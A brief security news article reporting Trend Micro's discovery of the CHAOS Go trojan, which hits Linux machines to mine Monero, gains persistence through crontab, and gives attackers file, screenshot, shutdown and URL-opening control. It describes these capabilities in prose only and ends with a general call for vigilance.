A new Go malware called CHAOS is hitting Linux users in a crypto mining campaign.
The CHAOS Trojan was discovered by Trend Micro in November 2022. A special feature of the malware is the destruction of other cryptominers and the deployment of its own, used to mine Monero.
According to the researchers, CHAOS is fixed in the system by changing the file /etc/crontab (crontab is a special file that contains a schedule of tasks that the cron task scheduler will run), which is downloaded from Pastebin every 10 minutes.
At this point, the payload is loaded, consisting of the XMRig miner and the CHAOS Go trojan. The main loader script and subsequent payloads are placed in multiple places, making the campaign much harder to stop.
After downloading and launching, CHAOS transmits metadata about the victim's system to the attacker's server, and also provides hackers with the following functionality:
Interaction with files;
Creation of screenshots;
Shutdown / restart the computer;
Opening arbitrary URLs.
Experts warn that hacks are getting more sophisticated and sophisticated, so campaigns and consumers alike need to stay vigilant about their cybersecurity.